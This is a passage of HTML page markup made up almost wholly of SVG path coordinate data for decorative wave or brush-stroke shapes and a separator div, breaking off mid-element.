d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n        <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n        <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n        <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n        <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n        <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n        <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n        <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n        <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n        <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n        <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n        <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n        <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n        <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n        <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n        <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n        <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n        <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n        <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n        <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n        <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n        <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n        <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n        <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n        <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n        <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n        <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n        <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n        <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n        <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n        <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n        <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n        <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n        <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n        <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n        <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n        <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n        <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n        <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n        <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n        <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n        <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n        <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n        <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n        <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n        <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n        <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n        <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n        <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n        <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n        <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n        <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n        <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n        <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n        <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n        <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n        <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n        <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n        <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n        <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n        <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n        <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n        <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n        <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n        <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n        <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n        <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n        <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n        <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n        <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n        <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n        <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n        <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n        <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n        <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n        <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n        <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n        <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n        <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n        <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n        <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n        <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n        <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n        <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n        <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n        <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n        <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n        <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n        <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n        <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n        <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n        <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n        <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n        <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n        <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n        <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n        <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n        <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n        <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n        <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n        <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n        <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n        <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n        <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n        <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n        <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n        <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n        <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n        <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n        <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n        <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n        <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n        <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n        <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n        <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n        <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n        <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n        <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n        <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n        <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n        <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n        <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n        <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n        <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n        <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n        <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n        <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n        <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n      </svg>\n    </div>\n    <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n      <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n          transform=\"translate(0 0)\"></path>\n        <path 